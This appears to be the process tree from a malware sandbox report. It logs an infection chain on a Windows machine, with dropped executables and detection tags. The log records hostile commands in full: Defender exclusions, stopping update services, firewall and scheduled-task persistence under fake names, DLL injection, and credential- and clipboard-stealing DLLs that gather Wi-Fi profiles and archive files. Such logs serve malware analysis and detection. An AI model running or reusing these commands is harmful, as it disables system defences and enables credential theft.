- Suspicious use of SetThreadContext
PID:5356

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
8⤵
PID:6732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 540
9⤵
- Program crash
PID:6056

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2cy475kA.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2cy475kA.exe
7⤵
- Executes dropped EXE
PID:6344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F379.bat" "
2⤵
PID:1628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
3⤵
PID:6036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
4⤵
PID:6044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
3⤵
PID:4332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
4⤵
PID:2324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
3⤵
PID:324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xdc,0x100,0x104,0x80,0x108,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
4⤵
PID:5268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
3⤵
PID:7000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
4⤵
PID:6712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
3⤵
PID:7200

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
4⤵
PID:7212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
3⤵
PID:7264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
4⤵
PID:7292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
3⤵
PID:7416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
4⤵
PID:7436

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
3⤵
PID:7596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
4⤵
PID:7612

C:\Users\Admin\AppData\Local\Temp\F704.exe
C:\Users\Admin\AppData\Local\Temp\F704.exe
2⤵
- Executes dropped EXE
PID:5516

C:\Users\Admin\AppData\Local\Temp\F7F0.exe
C:\Users\Admin\AppData\Local\Temp\F7F0.exe
2⤵
- Executes dropped EXE
PID:4828

C:\Users\Admin\AppData\Local\Temp\251B.exe
C:\Users\Admin\AppData\Local\Temp\251B.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:4880

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
3⤵
- Executes dropped EXE
PID:8164

C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:7544

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7780

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5784

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
3⤵
- Executes dropped EXE
PID:5632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:6688

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:8104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6400

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:8308

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:3824

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7548

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
- Executes dropped EXE
PID:5748

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Modifies data under HKEY_USERS
PID:6716

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- DcRat
- Creates scheduled task(s)
PID:4224

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
6⤵
PID:5316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:1392

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:6844

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
PID:8148

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- DcRat
- Creates scheduled task(s)
PID:2112

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
6⤵
PID:7880

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
PID:8940

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
- Launches sc.exe
PID:7504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8104 -s 628
5⤵
- Program crash
PID:5680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 820
4⤵
- Program crash
PID:8632

C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5092

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
4⤵
- Executes dropped EXE
PID:8240

C:\Users\Admin\AppData\Local\Temp\is-1ICKP.tmp\is-ODC8I.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1ICKP.tmp\is-ODC8I.tmp" /SL4 $1031A "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" 5112809 114176
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:8532

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 3
6⤵
PID:2244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 3
7⤵
PID:8628

C:\Program Files (x86)\IBuster\IBuster.exe
"C:\Program Files (x86)\IBuster\IBuster.exe" -i
6⤵
- Executes dropped EXE
PID:568

C:\Program Files (x86)\IBuster\IBuster.exe
"C:\Program Files (x86)\IBuster\IBuster.exe" -s
6⤵
- Executes dropped EXE
PID:8616

C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:8132

C:\Users\Admin\AppData\Local\Temp\2A5C.exe
C:\Users\Admin\AppData\Local\Temp\2A5C.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:8180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:8296

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91bde46f8,0x7ff91bde4708,0x7ff91bde4718
4⤵
PID:3240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2200,5245779482854257694,18314798331520807251,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2648 /prefetch:8
4⤵
PID:8648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,5245779482854257694,18314798331520807251,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
4⤵
PID:3976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,5245779482854257694,18314798331520807251,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
4⤵
PID:8604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5245779482854257694,18314798331520807251,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
4⤵
PID:8748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5245779482854257694,18314798331520807251,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
4⤵
PID:8740

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5245779482854257694,18314798331520807251,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
4⤵
PID:4696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5245779482854257694,18314798331520807251,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
4⤵
PID:9068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5245779482854257694,18314798331520807251,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
4⤵
PID:6876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5245779482854257694,18314798331520807251,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1
4⤵
PID:2772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5245779482854257694,18314798331520807251,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
4⤵
PID:7884

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,5245779482854257694,18314798331520807251,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4492 /prefetch:8
4⤵
PID:7516

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,5245779482854257694,18314798331520807251,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4492 /prefetch:8
4⤵
PID:7528

C:\Users\Admin\AppData\Local\Temp\36E0.exe
C:\Users\Admin\AppData\Local\Temp\36E0.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7196 -s 840
3⤵
- Program crash
PID:8152

C:\Users\Admin\AppData\Local\Temp\39FE.exe
C:\Users\Admin\AppData\Local\Temp\39FE.exe
2⤵
- Executes dropped EXE
PID:7764

C:\Users\Admin\AppData\Local\Temp\40F4.exe
C:\Users\Admin\AppData\Local\Temp\40F4.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:1224

C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:8332

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
4⤵
- DcRat
- Creates scheduled task(s)
PID:8476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\e8b5234212" /P "Admin:N"&&CACLS "..\e8b5234212" /P "Admin:R" /E&&Exit
4⤵
PID:4196

C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:N"
5⤵
PID:8652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:8660

C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:R" /E
5⤵
PID:9008

C:\Windows\SysWOW64\cacls.exe
CACLS "..\e8b5234212" /P "Admin:R" /E
5⤵
PID:8868

C:\Windows\SysWOW64\cacls.exe
CACLS "..\e8b5234212" /P "Admin:N"
5⤵
PID:8828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:8840

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
4⤵
PID:888

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
5⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:3448

C:\Windows\system32\netsh.exe
netsh wlan show profiles
6⤵
PID:8816

C:\Windows\system32\tar.exe
tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\771604342093_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"
6⤵
PID:8224

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll, Main
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:9120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:3968

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
PID:7760

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:8276

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:7328

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:9196

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:5012

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Loads dropped DLL
- Launches sc.exe
PID:888

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:8336

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:8200

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:5256

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:2680

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:5388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
2⤵
PID:8512

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
2⤵
PID:7392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:9096

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
PID:2268

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2156

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:5156

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:6708

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:2244

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:6876

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:5540

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
